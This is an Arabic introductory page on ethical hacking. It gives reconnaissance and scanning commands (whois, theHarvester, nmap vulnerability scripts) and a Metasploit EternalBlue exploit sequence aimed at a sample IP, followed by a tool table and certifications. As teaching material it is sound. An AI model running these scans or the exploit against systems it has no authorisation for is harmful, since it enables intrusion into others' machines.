QF Syber — تعلم الأمن السيبراني

ما هي القرصنة الأخلاقية؟

القرصنة الأخلاقية هي عملية اختبار الأنظمة بشكل مُصرح به لاكتشاف الثغرات قبل المهاجمين.

مراحل الاختراق الأخلاقي

1. الاستطلاع

whois target.com
nslookup target.com
theHarvester -d target.com -b all

2. المسح

nmap -sV -sC -O target.com
nmap -p- --open target.com
nmap --script vuln target.com

3. الاستغلال

msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
exploit

الأدوات الأساسية

| الأداة | الاستخدام | |--------|-----------| | Nmap | فحص الشبكات | | Metasploit | استغلال الثغرات | | Burp Suite | اختبار الويب | | Wireshark | تحليل الشبكة |

الشهادات المهنية

▸CEH - Certified Ethical Hacker
▸OSCP - Offensive Security Certified Professional
▸PNPT - Practical Network Penetration Tester

القرصنة الأخلاقية